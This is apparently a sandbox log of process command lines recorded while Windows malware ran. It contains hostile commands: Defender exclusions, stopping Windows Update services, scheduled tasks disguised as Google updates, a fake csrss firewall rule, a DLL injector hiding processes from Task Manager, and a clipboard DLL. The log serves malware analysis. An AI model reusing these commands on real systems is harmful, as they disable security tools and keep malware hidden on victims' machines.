C:\Users\Admin\AppData\Local\Temp\DD37.exe

C:\Users\Admin\AppData\Local\Temp\DD37.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 552 -ip 552

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3428 -ip 3428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 /prefetch:3

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1940 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\F15C.exe

C:\Users\Admin\AppData\Local\Temp\F15C.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Users\Admin\AppData\Local\Temp\F2C4.exe

C:\Users\Admin\AppData\Local\Temp\F2C4.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\14C.exe

C:\Users\Admin\AppData\Local\Temp\14C.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\138F.exe

C:\Users\Admin\AppData\Local\Temp\138F.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\F0A.exe

C:\Users\Admin\AppData\Local\Temp\F0A.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5660 -ip 5660

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\7B6.exe

C:\Users\Admin\AppData\Local\Temp\7B6.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp" /SL5="$40250,3039358,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "HAC1030-3"

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -i

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -s

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5992 -ip 5992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffb024046f8,0x7ffb02404708,0x7ffb02404718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5244 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x49c 0x338

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6396 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8412 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8860 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

